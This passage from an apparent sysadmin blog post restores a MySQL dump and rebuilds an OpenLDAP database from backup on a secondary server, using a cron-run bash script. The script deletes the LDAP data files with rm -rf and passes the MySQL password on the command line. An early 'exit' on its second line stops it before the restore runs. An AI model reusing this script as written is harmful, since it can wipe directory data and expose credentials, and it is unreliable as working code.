mysql -pPASSWD < /var/nfs/all-database.sql

2. Create shell script to restore ldap as follow

#!/bin/bash
touch /tmp/ldap-restore && exit
rm -rf /var/lib/ldap/domain.com/__*
rm -rf /var/lib/ldap/domain.com/*.bdb
rm -rf /var/lib/ldap/domain.com/alock
rm -rf /var/lib/ldap/domain.com/log.*
/etc/init.d/ldap stop
/usr/sbin/slapadd -f /etc/openldap/slapd.conf -l /var/nfs/backup-ldap.ldif
chown -R ldap.ldap /var/lib/ldap/domain.com/
/etc/init.d/ldap start

3. Run the script on crond, maybe you might set every 1hour or some minutes for giving some time for primary server to generate the backup and rsync.

 

May 6th, 2013 | Category: Postfix | Leave a comment
« Newer Entries  
  Older Entries »